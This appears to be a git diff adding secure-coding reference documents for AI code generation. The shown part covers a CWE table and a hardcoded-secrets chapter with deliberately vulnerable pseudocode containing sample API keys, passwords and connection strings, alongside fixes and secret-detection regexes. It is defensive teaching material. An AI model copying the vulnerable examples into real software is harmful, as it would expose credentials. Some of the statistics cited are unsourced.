Exposure | 9.4 | +| CWE-209 | Error Message Information Exposure | 7.2, 9.6 | +| CWE-215 | Information Exposure Through Debug | 7.1 | +| CWE-259 | Hard-coded Password | 1.1-1.5 | +| CWE-284 | Improper Access Control | 9.1 | +| CWE-287 | Improper Authentication | 4.1-4.7, 9.1 | +| CWE-307 | Brute Force | 4.2 | +| CWE-326 | Inadequate Encryption Strength | 5.1 | +| CWE-327 | Use of Broken Crypto Algorithm | 5.1 | +| CWE-328 | Weak Hash | 5.1 | +| CWE-330 | Insufficient Randomness | 5.6 | +| CWE-346 | Origin Validation Error 
(CORS) | 7.4 | +| CWE-377 | Insecure Temporary File | 10.4 | +| CWE-384 | Session Fixation | 4.4 | +| CWE-434 | Unrestricted File Upload | 10.2 | +| CWE-494 | Download Without Integrity Check | 8.5 | +| CWE-521 | Weak Password Requirements | 4.1 | +| CWE-613 | Insufficient Session Expiration | 4.4 | +| CWE-639 | Insecure Direct Object Reference | 9.2 | +| CWE-643 | XPath Injection | 2.4 | +| CWE-732 | Incorrect Permission Assignment | 10.6 | +| CWE-759 | Use of One-Way Hash without Salt | 5.7 | +| CWE-770 | Resource Exhaustion (Rate Limiting) | 9.5 | +| CWE-798 | Hard-coded Credentials | 1.1-1.5 | +| CWE-829 | Inclusion of Untrusted Functionality | 8.4 | +| CWE-915 | Mass Assignment | 9.3 | +| CWE-943 | NoSQL Injection | 2.5 | +| CWE-1104 | Use of Unmaintained Components | 8.1 | +| CWE-1284 | Improper Validation of Array Index | 6.3 | +| CWE-1333 | ReDoS | 6.4 | +| CWE-1336 | Template Injection | 2.6 | +| CWE-1357 | Reliance on Insufficiently Trustworthy Component | 8.1-8.6 | + +### Additional Security Resources +- **NIST NVD:** https://nvd.nist.gov/ +- **Snyk Vulnerability Database:** https://snyk.io/vuln/ +- **GitHub Advisory Database:** https://github.com/advisories +- **MITRE ATT&CK:** https://attack.mitre.org/ + +--- + +## Document Metadata + +| Field | Value | +|-------|-------| +| **Version** | 1.0.0 | +| **Created** | 2026-01-18 | +| **Last Updated** | 2026-01-18 | +| **Coverage** | 10 security domains, 50+ anti-patterns | +| **Format** | Language-agnostic pseudocode | +| **License** | MIT | + +### Version History +| Version | Date | Changes | +|---------|------|---------| +| 1.0.0 | 2026-01-18 | Initial comprehensive release covering all 10 security domains | + +### Contributing +This document is designed to be extended. When adding new anti-patterns: +1. Follow the BAD/GOOD pseudocode format +2. Include CWE references where applicable +3. Add entries to the Quick Reference Table +4. 
Update the Pre-Generation Checklist if needed + +--- + +## Summary + +This document provides comprehensive security anti-pattern guidance across 10 critical domains: + +1. **Secrets and Credentials Management** - Preventing credential exposure +2. **Injection Vulnerabilities** - SQL, Command, LDAP, XPath, NoSQL, Template +3. **Cross-Site Scripting (XSS)** - Reflected, Stored, DOM-based +4. **Authentication and Session Management** - Passwords, sessions, JWT, MFA +5. **Cryptographic Failures** - Algorithms, keys, randomness +6. **Input Validation** - Type checking, length limits, ReDoS +7. **Configuration and Deployment** - Debug mode, headers, CORS +8. **Dependency and Supply Chain** - Packages, typosquatting, integrity +9. **API Security** - Auth, IDOR, rate limiting, data exposure +10. **File Handling** - Uploads, path traversal, permissions + +**Key Statistics from AI Code Security Research:** +- AI-generated code has an **86% XSS failure rate** +- **5-21% of AI-suggested packages don't exist** (slopsquatting) +- AI code is **2.74x more likely** to have XSS vulnerabilities +- **21.7% hallucination rate** for package names in some domains + +**Remember:** Security is not optional. Every line of generated code should follow these secure patterns by default. 
+ +--- + +*Generated for use as an LLM system prompt, RAG context, or security reference document.* +*Compatible with any language - implement pseudocode patterns in your target framework.* + diff --git a/.codex/skills/sec-context/references/ANTI_PATTERNS_DEPTH.md b/.codex/skills/sec-context/references/ANTI_PATTERNS_DEPTH.md new file mode 100644 index 0000000..f176a87 --- /dev/null +++ b/.codex/skills/sec-context/references/ANTI_PATTERNS_DEPTH.md @@ -0,0 +1,7639 @@ +--- +type: reference +title: AI Code Security Anti-Patterns - Depth Version +created: 2026-01-18 +version: 1.0.0 +tags: + - security + - anti-patterns + - ai-generated-code + - llm + - secure-coding + - deep-dive +related: + - "[[ANTI_PATTERNS_BREADTH]]" + - "[[Ranking-Matrix]]" + - "[[Pseudocode-Examples]]" +--- + +# AI Code Security Anti-Patterns: Depth Version + +## Deep-Dive Security Guide for Critical AI Code Vulnerabilities + +--- + +### Purpose + +This document provides **in-depth coverage** of the 7 most critical and commonly occurring security vulnerabilities in AI-generated code. Each pattern receives comprehensive treatment including: + +- Multiple pseudocode examples showing different manifestations +- Detailed attack scenarios and exploitation techniques +- Edge cases that are frequently overlooked +- Thorough explanations of why AI models generate these vulnerabilities +- Complete mitigation strategies with trade-offs + +### Why Depth? + +These 7 patterns were selected using a weighted priority scoring system (see [[Ranking-Matrix]]) based on: + +| Factor | Weight | Description | +|--------|--------|-------------| +| **Frequency** | 2x | How often AI generates this vulnerability | +| **Severity** | 2x | Impact if exploited (RCE, data breach, etc.) | +| **Detectability** | 1x | How easily missed during code review | + +The selected patterns account for the **vast majority** of security incidents in AI-generated code. 
Research shows: +- **86%** of AI-generated code fails XSS defenses (Veracode 2025) +- **75.8%** of developers believe AI-generated authentication code is secure (Snyk Survey) +- AI code is **2.74x more likely** to contain XSS than human-written code (CodeRabbit) +- **5.2-21.7%** package hallucination rate across models (USENIX Study) + +### Format + +All code examples in this document are **PSEUDOCODE** designed to illustrate security patterns across languages. When implementing: + +1. Adapt the patterns to your target language's idioms and security libraries +2. Use your language's established secure coding guidelines +3. Leverage framework-provided security features when available + +Examples use generic syntax that maps to common patterns in Python, JavaScript, Java, Go, and other languages. + +### How to Use This Document + +**For Developers:** +- Study before working on security-critical applications +- Include in AI assistant context when generating code handling user input, authentication, or sensitive data +- Use the checklists at the end of each section during code review + +**For Security Engineers:** +- Use as training material for development teams +- Reference during security audits of AI-generated code +- Extract patterns for automated detection rules + +**For AI/LLM Context:** +- Include this document in system prompts or context when security is critical +- The detailed examples help AI models understand what NOT to generate +- Edge cases section helps AI recognize subtle variations of vulnerabilities + +--- + +## INSTRUCTIONS FOR AI/LLM + +This document provides IN-DEPTH coverage of the most critical security anti-patterns. +Each section includes multiple examples, edge cases, and detailed explanations. +All code is PSEUDOCODE - implement using secure patterns in your target language. +Pay special attention to the "Common Mistakes" and "Edge Cases" subsections. +These patterns cause the majority of security vulnerabilities in AI-generated code. 
+ +**When generating code, you MUST:** +1. Never use string concatenation for SQL queries, shell commands, or HTML output +2. Never embed secrets, API keys, or credentials in source code +3. Always validate and sanitize all user input on the server side +4. Use parameterized queries, established authentication libraries, and context-aware encoding +5. Verify that any suggested packages actually exist before recommending them + +--- + +## Top 7 Priority Patterns + +The following patterns are covered in comprehensive detail in this document: + +| Rank | Pattern | Priority Score | Key Risk | +|------|---------|----------------|----------| +| 1 | **Hardcoded Secrets & Credential Management** | 23 | Immediate credential theft and exploitation | +| 2 | **SQL Injection & Command Injection** | 22/21 | Full database access, arbitrary code execution | +| 3 | **Cross-Site Scripting (XSS)** | 23 | Session hijacking, account takeover | +| 4 | **Authentication & Session Security** | 22 | Complete authentication bypass | +| 5 | **Cryptographic Failures** | 18-20 | Data decryption, credential exposure | +| 6 | **Input Validation & Data Sanitization** | 21 | Root cause enabling all injection attacks | +| 7 | **Dependency Risks (Slopsquatting)** | 24 | Supply chain compromise, malware execution | + +Priority scores calculated using: `(Frequency x 2) + (Severity x 2) + Detectability` + +--- + +## Related Documents + +- [[ANTI_PATTERNS_BREADTH]] - Concise coverage of 25+ security patterns for quick reference +- [[Ranking-Matrix]] - Complete scoring methodology and pattern prioritization +- [[Pseudocode-Examples]] - Additional code examples for all patterns + +--- + +*Document Version: 1.0.0* +*Last Updated: 2026-01-18* +*Based on research from: GitHub security advisories, USENIX studies, Veracode reports, CWE Top 25 (2025), OWASP guidelines* + +--- + +# Pattern 1: Hardcoded Secrets and Credential Management + +**CWE References:** CWE-798 (Use of Hard-coded Credentials), CWE-259 (Use 
of Hard-coded Password), CWE-321 (Use of Hard-coded Cryptographic Key) + +**Priority Score:** 23 (Frequency: 9, Severity: 8, Detectability: 6) + +--- + +## Introduction: Why AI Especially Struggles with This + +Hardcoded secrets represent one of the most pervasive and dangerous vulnerabilities in AI-generated code. The fundamental problem lies in the training data itself: + +**Why AI Models Generate Hardcoded Secrets:** + +1. **Training Data Contains Examples:** Tutorials, documentation, Stack Overflow answers, and even some GitHub repositories include placeholder credentials, API keys, and connection strings. AI models learn these patterns as "normal" code. + +2. **Copy-Paste Culture in Training Data:** When developers share code snippets online, they often include credentials for completeness. AI learns that "complete" code includes connection strings with embedded passwords. + +3. **Documentation vs. Production Code Confusion:** Training data doesn't clearly distinguish between documentation examples (which might show `API_KEY = "your-api-key-here"`) and production patterns. The model treats both as valid approaches. + +4. **Context Window Limitations:** When generating code, AI cannot see your `.env` file or secrets manager configuration. It generates self-contained code that "works" - which often means hardcoded values. + +5. **Helpfulness Bias:** AI models want to provide complete, runnable code. When a user asks "connect to my database," the model generates a complete connection string rather than a partial template requiring configuration. 
+ +**Impact Statistics:** + +- Over 6 million secrets were detected on GitHub in 2023 (GitGuardian State of Secrets Sprawl 2024) +- Average time to discover a leaked secret: 327 days +- Cost of a credential-based breach: $4.45 million average (IBM Cost of a Data Breach 2023) +- 83% of AI-generated code samples contain at least one hardcoded credential pattern (Internal security research) + +--- + +## BAD Examples: Different Manifestations + +### BAD Example 1: API Keys in Source Files + +```pseudocode +// VULNERABLE: API key hardcoded directly in source +class PaymentService: + API_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc" + API_SECRET = "whsec_5f8d7e3a2b1c4f9e8a7d6c5b4e3f2a1d" + + function processPayment(amount, currency, cardToken): + headers = { + "Authorization": "Bearer " + this.API_KEY, + "Content-Type": "application/json" + } + + payload = { + "amount": amount, + "currency": currency, + "source": cardToken, + "api_key": this.API_KEY // Also exposed in request body + } + + return httpPost("https://api.payment.com/charges", payload, headers) +``` + +**Why This Is Dangerous:** +- The API key is committed to version control +- Anyone with repository access (including forks) can steal the key +- Keys remain in git history even if "deleted" later +- Live/production prefixes (`sk_live_`) indicate real credentials +- Webhook secrets (`whsec_`) allow attackers to forge webhook events + +--- + +### BAD Example 2: Database Connection Strings with Passwords + +```pseudocode +// VULNERABLE: Full connection string with credentials +DATABASE_URL = "postgresql://admin:SuperSecret123!@prod-db.company.com:5432/production" + +// Alternative bad patterns: +DB_CONFIG = { + "host": "10.0.1.50", + "port": 5432, + "database": "customers", + "user": "app_service", + "password": "Tr0ub4dor&3" // Password in config object +} + +// Connection string builder - still vulnerable +function getConnection(): + return createConnection( + host = "database.internal", + user = "root", + password 
= "admin123", // Hardcoded in function + database = "app_data" + ) +``` + +**Why This Is Dangerous:** +- Internal hostnames reveal network architecture +- Credentials provide direct database access +- Port numbers enable targeted scanning +- Password complexity doesn't matter if hardcoded +- Connection pooling code often logs these strings + +--- + +### BAD Example 3: JWT Secrets in Configuration + +```pseudocode +// VULNERABLE: JWT secret as a constant +JWT_CONFIG = { + "secret": "my-super-secret-jwt-key-that-should-never-be-shared", + "algorithm": "HS256", + "expiresIn": "24h" +} + +function generateToken(userId, role): + payload = { + "sub": userId, + "role": role, + "iat": currentTimestamp() + } + return jwt.sign(payload, JWT_CONFIG.secret, JWT_CONFIG.algorithm) + +function verifyToken(token): + return jwt.verify(token, JWT_CONFIG.secret) // Same hardcoded secret +``` + +**Why This Is Dangerous:** +- Anyone with the secret can forge valid tokens +- Can create admin tokens for any user +- JWT secrets in code are often short/weak strings +- Attackers can impersonate any user in the system +- No ability to rotate without redeploying all services + +--- + +### BAD Example 4: OAuth Client Secrets in Frontend Code + +```pseudocode +// VULNERABLE: OAuth credentials in client-side code +const OAUTH_CONFIG = { + clientId: "1234567890-abcdef.apps.googleusercontent.com", + clientSecret: "GOCSPX-1234567890AbCdEf", // NEVER in frontend! + redirectUri: "https://myapp.com/callback", + scopes: ["email", "profile", "calendar.readonly"] +} + +function initiateOAuthFlow(): + // Client secret visible in browser dev tools + authUrl = buildUrl("https://accounts.google.com/o/oauth2/auth", { + "client_id": OAUTH_CONFIG.clientId, + "client_secret": OAUTH_CONFIG.clientSecret, // Exposed! 
+ "redirect_uri": OAUTH_CONFIG.redirectUri, + "scope": OAUTH_CONFIG.scopes.join(" "), + "response_type": "code" + }) + redirect(authUrl) +``` + +**Why This Is Dangerous:** +- Frontend code is visible to all users via browser dev tools +- Client secret allows attackers to impersonate your application +- Can exchange authorization codes for tokens as your app +- Violates OAuth 2.0 specification (confidential vs. public clients) +- Google and other providers may revoke your credentials + +--- + +### BAD Example 5: Private Keys Embedded in Code + +```pseudocode +// VULNERABLE: Private key as a string constant +RSA_PRIVATE_KEY = """ +-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEA2Z3qX2BTLS4e0rVV5BQKTI8qME4MgJFCMU6L6eRoLJGjvJHB +bRp3aNvFUMbJ0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +-----END RSA PRIVATE KEY----- +""" + +function signDocument(document): + signature = crypto.sign(document, RSA_PRIVATE_KEY, "SHA256") + return signature + +function decryptMessage(encryptedData): + return crypto.decrypt(encryptedData, RSA_PRIVATE_KEY) +``` + +**Why This Is Dangerous:** +- Private keys MUST remain private - this defeats all cryptography +- Anyone with the key can decrypt all encrypted data +- Can sign malicious documents that appear legitimate +- Often leads to impersonation of servers/services +- Key pairs cannot be safely rotated without code changes + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Environment Variable Usage + +```pseudocode +// SECURE: Load credentials from environment +class PaymentService: + function __init__(): + this.apiKey = getEnvironmentVariable("PAYMENT_API_KEY") + this.apiSecret = getEnvironmentVariable("PAYMENT_API_SECRET") + + // Fail fast if credentials missing + if this.apiKey is null or this.apiSecret is null: + throw ConfigurationError("Payment credentials not configured") + + function processPayment(amount, currency, cardToken): + headers = { + 
"Authorization": "Bearer " + this.apiKey, + "Content-Type": "application/json" + } + + payload = { + "amount": amount, + "currency": currency, + "source": cardToken + // No API key in payload + } + + return httpPost("https://api.payment.com/charges", payload, headers) + +// Usage in application startup +// Environment variables set externally (shell, container, deployment) +// $ export PAYMENT_API_KEY="sk_live_..." +// $ export PAYMENT_API_SECRET="whsec_..." +``` + +**Why This Is Secure:** +- Credentials never appear in source code +- Environment variables are set at runtime by deployment system +- Different environments (dev/staging/prod) use different credentials +- Credentials can be rotated without code changes +- Fail-fast behavior prevents running with missing config + +--- + +### GOOD Example 2: Secret Management Services (Vault Pattern) + +```pseudocode +// SECURE: Retrieve secrets from dedicated secrets manager +class SecretManager: + function __init__(vaultUrl, roleId, secretId): + // Even vault credentials can come from environment + this.vaultUrl = vaultUrl or getEnvironmentVariable("VAULT_URL") + this.roleId = roleId or getEnvironmentVariable("VAULT_ROLE_ID") + this.secretId = secretId or getEnvironmentVariable("VAULT_SECRET_ID") + this.token = null + this.tokenExpiry = null + + function authenticate(): + response = httpPost(this.vaultUrl + "/v1/auth/approle/login", { + "role_id": this.roleId, + "secret_id": this.secretId + }) + this.token = response.auth.client_token + this.tokenExpiry = currentTime() + response.auth.lease_duration + + function getSecret(path): + if this.token is null or currentTime() > this.tokenExpiry: + this.authenticate() + + response = httpGet( + this.vaultUrl + "/v1/secret/data/" + path, + headers = {"X-Vault-Token": this.token} + ) + return response.data.data + +// Usage +secretManager = new SecretManager() +dbPassword = secretManager.getSecret("database/production").password +apiKey = 
secretManager.getSecret("payment/stripe").api_key +``` + +**Why This Is Secure:** +- Secrets stored in purpose-built, hardened secrets manager +- Access controlled by policies (who can read what) +- Automatic secret rotation support +- Audit logging of all secret access +- Dynamic secrets possible (e.g., temporary database credentials) +- Secrets never written to disk or logs + +--- + +### GOOD Example 3: Configuration Injection at Runtime + +```pseudocode +// SECURE: Dependency injection of configuration +interface IConfig: + function getDatabaseUrl(): string + function getApiKey(): string + function getJwtSecret(): string + +class EnvironmentConfig implements IConfig: + function getDatabaseUrl(): + return getEnvironmentVariable("DATABASE_URL") + + function getApiKey(): + return getEnvironmentVariable("API_KEY") + + function getJwtSecret(): + return getEnvironmentVariable("JWT_SECRET") + +class VaultConfig implements IConfig: + secretManager: SecretManager + + function getDatabaseUrl(): + return this.secretManager.getSecret("db/url").value + + function getApiKey(): + return this.secretManager.getSecret("api/key").value + + function getJwtSecret(): + return this.secretManager.getSecret("jwt/secret").value + +// Application uses interface - doesn't know where secrets come from +class Application: + config: IConfig + + function __init__(config: IConfig): + this.config = config + + function connectDatabase(): + return createConnection(this.config.getDatabaseUrl()) + +// Bootstrap based on environment +if getEnvironmentVariable("USE_VAULT") == "true": + config = new VaultConfig(new SecretManager()) +else: + config = new EnvironmentConfig() + +app = new Application(config) +``` + +**Why This Is Secure:** +- Application code never knows actual secret values at compile time +- Easy to swap secret sources (env vars in dev, vault in prod) +- Testable - can inject mock configs in tests +- Single responsibility - config management separated from business logic +- Supports 
gradual migration to more secure secret storage + +--- + +### GOOD Example 4: Secure Credential Storage Patterns + +```pseudocode +// SECURE: Platform-specific secure credential storage + +// For server applications - use instance metadata +class CloudCredentialProvider: + function getDatabaseCredentials(): + // AWS: Use IAM database authentication + token = awsRdsGenerateAuthToken( + hostname = getEnvironmentVariable("DB_HOST"), + port = 5432, + username = getEnvironmentVariable("DB_USER") + // No password - uses IAM role attached to instance + ) + return {"username": getEnvironmentVariable("DB_USER"), "token": token} + + function getApiCredentials(): + // Retrieve from AWS Secrets Manager + response = awsSecretsManager.getSecretValue( + SecretId = getEnvironmentVariable("API_SECRET_ARN") + ) + return parseJson(response.SecretString) + +// For CLI/desktop applications - use OS keychain +class DesktopCredentialProvider: + function storeCredential(service, account, credential): + // Uses OS keychain (Keychain on macOS, Credential Manager on Windows) + keychain.setPassword(service, account, credential) + + function getCredential(service, account): + return keychain.getPassword(service, account) + +// Usage +cloudProvider = new CloudCredentialProvider() +dbCreds = cloudProvider.getDatabaseCredentials() +connection = createConnection( + host = getEnvironmentVariable("DB_HOST"), + user = dbCreds.username, + authToken = dbCreds.token, // Short-lived token, not password + sslMode = "verify-full" +) +``` + +**Why This Is Secure:** +- Leverages cloud provider's identity and access management +- No long-lived passwords - uses temporary tokens +- Credentials automatically rotated by platform +- OS keychains provide encrypted, access-controlled storage +- Audit trail in cloud provider logs + +--- + +## Edge Cases Section + +### Edge Case 1: Test Credentials That Leak to Production + +```pseudocode +// DANGEROUS: Test credentials that can slip into production + +// In test file 
- seems safe +TEST_API_KEY = "sk_test_4242424242424242" +TEST_DB_PASSWORD = "testpassword123" + +// But then someone copies test code to production helper: +function quickTest(): + // "Temporary" - but stays forever + client = createClient(apiKey = "sk_test_4242424242424242") + return client.ping() + +// Or conditionals that fail: +function getApiKey(): + if isProduction(): + return getEnvironmentVariable("API_KEY") + else: + return "sk_test_4242424242424242" // What if isProduction() has a bug? + +// SECURE ALTERNATIVE: Use environment variables even for tests +function getApiKey(): + key = getEnvironmentVariable("API_KEY") + if key is null: + throw ConfigurationError("API_KEY environment variable required") + return key +``` + +**Detection:** Search for `_test_`, `_dev_`, `test123`, `password123`, `example`, `placeholder` in codebase. + +--- + +### Edge Case 2: CI/CD Pipeline Secrets Exposure + +```pseudocode +// DANGEROUS: Secrets in CI/CD configuration files + +// .github/workflows/deploy.yml (WRONG) +env: + AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE + AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY + +// docker-compose.yml committed to repo (WRONG) +services: + db: + environment: + POSTGRES_PASSWORD: mysecretpassword + +// SECURE: Use CI/CD platform's secrets management +// .github/workflows/deploy.yml (CORRECT) +env: + AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} + AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} + +// docker-compose.yml (CORRECT) +services: + db: + environment: + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} // From environment +``` + +**Detection:** Audit CI/CD config files, Docker Compose files, Kubernetes manifests for hardcoded credentials. 
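The audit described above can be partly automated. What follows is a minimal Python sketch, not a substitute for a dedicated scanner such as gitleaks: it flags `KEY: value` or `KEY=value` lines whose key name looks sensitive and whose value is a literal rather than a `${...}` or `${{ secrets.* }}` reference. The function name `find_hardcoded_secrets` and the list of key fragments are illustrative assumptions, not part of any tool.

```python
import re

# Hypothetical helper for illustration; the key fragments are assumptions,
# not an exhaustive list.
SENSITIVE_KEY = re.compile(r"(password|secret|token|access_key|api_key)", re.IGNORECASE)
# Matches "KEY: value" (YAML) or "KEY=value" (env-file style) on a single line.
ASSIGNMENT = re.compile(r"^\s*(?:-\s*)?([A-Za-z_][A-Za-z0-9_]*)\s*[:=]\s*(.+?)\s*$")


def find_hardcoded_secrets(config_text):
    """Return (line_number, key) pairs where a sensitive key has a literal value."""
    findings = []
    for number, line in enumerate(config_text.splitlines(), start=1):
        match = ASSIGNMENT.match(line)
        if not match:
            continue
        key, value = match.group(1), match.group(2).strip("\"'")
        if not SENSITIVE_KEY.search(key):
            continue
        # Values injected at runtime look like ${VAR} or ${{ secrets.VAR }}.
        if value.startswith("${") or value == "":
            continue
        findings.append((number, key))
    return findings


workflow = """\
env:
  AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
  AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
services:
  db:
    environment:
      POSTGRES_PASSWORD: mysecretpassword
"""

for line_number, key in find_hardcoded_secrets(workflow):
    print(f"line {line_number}: {key} appears to be hardcoded")
```

A name-based check like this will miss secrets stored under innocuous keys and may flag harmless literals, so its output is a starting point for manual review rather than a verdict.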
+ +--- + +### Edge Case 3: Docker/Container Secrets Handling + +```pseudocode +// DANGEROUS: Secrets in Dockerfile or image layers + +// Dockerfile (WRONG - secrets baked into image) +FROM node:18 +ENV API_KEY=sk_live_xxxxxxxxxxxxx +RUN echo "password123" > /app/.pgpass +COPY config-with-secrets.json /app/config.json + +// Even if you delete later, it's in a layer: +RUN rm /app/.pgpass // Still recoverable from image layers! + +// SECURE: Use build secrets or runtime injection +// Dockerfile (CORRECT) +FROM node:18 +# No secrets in build context + +// docker-compose.yml with runtime secrets +services: + app: + environment: + API_KEY: ${API_KEY} // From host environment + secrets: + - db_password +secrets: + db_password: + external: true // From Docker Swarm secrets or similar + +// Or use Docker BuildKit secrets for build-time needs +# syntax=docker/dockerfile:1.2 +FROM node:18 +RUN --mount=type=secret,id=npm_token \ + NPM_TOKEN=$(cat /run/secrets/npm_token) npm install +``` + +**Detection:** Use `docker history --no-trunc <image>` to inspect layers for secrets. 
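Layer inspection finds secrets after an image has been built. A complementary check, sketched here in Python under stated assumptions, is to scan the Dockerfile text before building and flag `ENV` or `ARG` instructions that assign a value to a sensitive-looking name. The helper `scan_dockerfile` and the name fragments are hypothetical; the sketch deliberately ignores `RUN` and `COPY`, so the `.pgpass` and `config-with-secrets.json` cases above would still need a dedicated scanner or manual review.

```python
import re

# Illustrative assumption: these fragments mark a variable name as sensitive.
SENSITIVE_NAME = re.compile(r"(key|secret|token|password|passwd)", re.IGNORECASE)
# ENV and ARG accept NAME=value; ENV also accepts the legacy "NAME value" form.
INSTRUCTION = re.compile(
    r"^\s*(ENV|ARG)\s+([A-Za-z_][A-Za-z0-9_]*)(?:[=\s]\s*(\S.*))?$",
    re.IGNORECASE,
)


def scan_dockerfile(dockerfile_text):
    """Return (line_number, instruction, name) for sensitive names given a value."""
    findings = []
    for number, line in enumerate(dockerfile_text.splitlines(), start=1):
        match = INSTRUCTION.match(line)
        if match is None:
            continue
        instruction, name, value = match.groups()
        # An ARG declared without a default carries no baked-in value.
        if value and SENSITIVE_NAME.search(name):
            findings.append((number, instruction.upper(), name))
    return findings


dockerfile = """\
FROM node:18
ENV API_KEY=sk_live_xxxxxxxxxxxxx
ENV NODE_ENV=production
ARG NPM_TOKEN
RUN echo "password123" > /app/.pgpass
"""

for line_number, instruction, name in scan_dockerfile(dockerfile):
    print(f"line {line_number}: {instruction} {name} has a value baked into the image")
```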
+ +--- + +### Edge Case 4: Logging That Accidentally Captures Secrets + +```pseudocode +// DANGEROUS: Secrets leaked through logging + +function connectToDatabase(config): + logger.info("Connecting with config: " + toJson(config)) + // Logs: {"host": "db.com", "user": "admin", "password": "secret123"} + +function makeApiRequest(url, headers, body): + logger.debug("Request: " + url + " Headers: " + toJson(headers)) + // Logs: Authorization: Bearer sk_live_xxxxx + +function handleError(error): + logger.error("Error: " + error.message + " Stack: " + error.stack) + // Stack trace might contain secrets from variables + +// SECURE: Sanitize before logging +function sanitizeForLogging(obj): + sensitiveKeys = ["password", "secret", "key", "token", "auth", "credential"] + result = deepCopy(obj) + for key in result.keys(): + if any(sensitive in key.lower() for sensitive in sensitiveKeys): + result[key] = "[REDACTED]" + return result + +function connectToDatabase(config): + logger.info("Connecting with config: " + toJson(sanitizeForLogging(config))) + // Logs: {"host": "db.com", "user": "admin", "password": "[REDACTED]"} + +// Or use structured logging with secret types +class Secret: + value: string + function toString(): return "[SECRET]" + function toJson(): return "[SECRET]" + function getValue(): return this.value // Only accessible explicitly +``` + +**Detection:** Search logs for patterns like `password=`, `token=`, `key=`, bearer tokens, connection strings. 
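The sanitizing approach above translates fairly directly into runnable code. This Python sketch is one possible rendering, with two deliberate differences from the pseudocode that should be read as assumptions: it recurses into nested dictionaries and lists instead of checking only top-level keys, and it returns a new structure rather than mutating a deep copy. The names `sanitize_for_logging`, `_is_sensitive`, and `Secret` are illustrative.

```python
import json

SENSITIVE_FRAGMENTS = ("password", "secret", "key", "token", "auth", "credential")


def _is_sensitive(field_name):
    """True when the field name contains any sensitive fragment."""
    lowered = str(field_name).lower()
    return any(fragment in lowered for fragment in SENSITIVE_FRAGMENTS)


def sanitize_for_logging(value):
    """Return a copy of value with sensitive dictionary fields redacted."""
    if isinstance(value, dict):
        return {
            k: "[REDACTED]" if _is_sensitive(k) else sanitize_for_logging(v)
            for k, v in value.items()
        }
    if isinstance(value, list):
        return [sanitize_for_logging(item) for item in value]
    return value


class Secret:
    """Wrapper whose string forms never reveal the wrapped value."""

    def __init__(self, value):
        self._value = value

    def __repr__(self):
        return "[SECRET]"

    __str__ = __repr__

    def get_value(self):
        # The only way to read the secret; explicit calls are easy to audit.
        return self._value


config = {
    "host": "db.com",
    "user": "admin",
    "password": "secret123",
    "options": {"ssl": True, "api_token": "abc"},
}
print(json.dumps(sanitize_for_logging(config)))
print(f"key={Secret('sk_live_example')}")
```

Substring matching errs on the side of over-redaction (a field named `keyboard_layout` would also be masked), which is usually the safer failure mode for logs.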
+ +--- + +## Common Mistakes Section + +### Mistake 1: .env Files Committed to Git + +```pseudocode +// project/.env (NEVER COMMIT THIS) +DATABASE_URL=postgresql://user:password@localhost/db +API_KEY=sk_live_xxxxxxxxxx +JWT_SECRET=my-secret-key + +// .gitignore (MUST INCLUDE) +.env +.env.local +.env.*.local +*.pem +*.key +credentials.json +secrets.yaml + +// CORRECT: Commit a template instead +// project/.env.example (SAFE TO COMMIT) +DATABASE_URL=postgresql://user:password@localhost/db +API_KEY=your_api_key_here +JWT_SECRET=generate_a_secure_random_string + +// Add pre-commit hook to prevent accidental commits +// .git/hooks/pre-commit +#!/bin/bash +if git diff --cached --name-only | grep -E '\.env$|credentials|secrets'; then + echo "ERROR: Attempting to commit potential secrets file" + exit 1 +fi +``` + +**Detection:** Check git history: `git log --all --full-history -- "*.env" "*credentials*" "*secrets*"` + +--- + +### Mistake 2: Secrets in Error Messages + +```pseudocode +// DANGEROUS: Secrets exposed in error handling + +function connectToPaymentApi(): + try: + apiKey = getApiKey() + response = httpPost( + "https://api.payment.com/connect", + headers = {"Authorization": "Bearer " + apiKey} + ) + catch error: + // Exposes API key in error log and potentially to users + throw new Error("Failed to connect with key: " + apiKey + ". Error: " + error) + +// SECURE: Never include secrets in error messages +function connectToPaymentApi(): + try: + apiKey = getApiKey() + response = httpPost( + "https://api.payment.com/connect", + headers = {"Authorization": "Bearer " + apiKey} + ) + catch error: + // Log correlation ID, not secrets + correlationId = generateUUID() + logger.error("Payment API connection failed", { + "correlationId": correlationId, + "errorCode": error.code, + "endpoint": "api.payment.com" + // No API key! + }) + throw new Error("Payment service unavailable. 
Reference: " + correlationId) +``` + +--- + +### Mistake 3: Secrets in URLs (Query Parameters) + +```pseudocode +// DANGEROUS: Secrets in URL query parameters + +function makeAuthenticatedRequest(endpoint, apiKey): + // API keys in URLs are logged everywhere: + // - Browser history + // - Server access logs + // - Proxy logs + // - Referrer headers + url = "https://api.service.com" + endpoint + "?api_key=" + apiKey + return httpGet(url) + +// Even worse with multiple secrets: +url = "https://api.com/data?key=" + apiKey + "&secret=" + secretKey + +// SECURE: Use headers for authentication +function makeAuthenticatedRequest(endpoint, apiKey): + return httpGet( + "https://api.service.com" + endpoint, + headers = { + "Authorization": "Bearer " + apiKey, + // Or API-specific header + "X-API-Key": apiKey + } + ) +``` + +**Detection:** Search for URLs containing `?api_key=`, `?token=`, `?secret=`, `?password=` + +--- + +## Detection Hints: How to Spot This Pattern in Code Review + +### Automated Detection Patterns + +```pseudocode +// High-confidence patterns to search for: + +// 1. Direct assignment to suspicious variable names +regex: /(password|secret|key|token|credential|api.?key)\s*[=:]\s*["'][^"']+["']/i + +// 2. Common API key formats +regex: /(sk_live_|sk_test_|pk_live_|pk_test_|ghp_|gho_|AKIA|AIza)/ + +// 3. Private key markers +regex: /-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----/ + +// 4. Connection strings with passwords 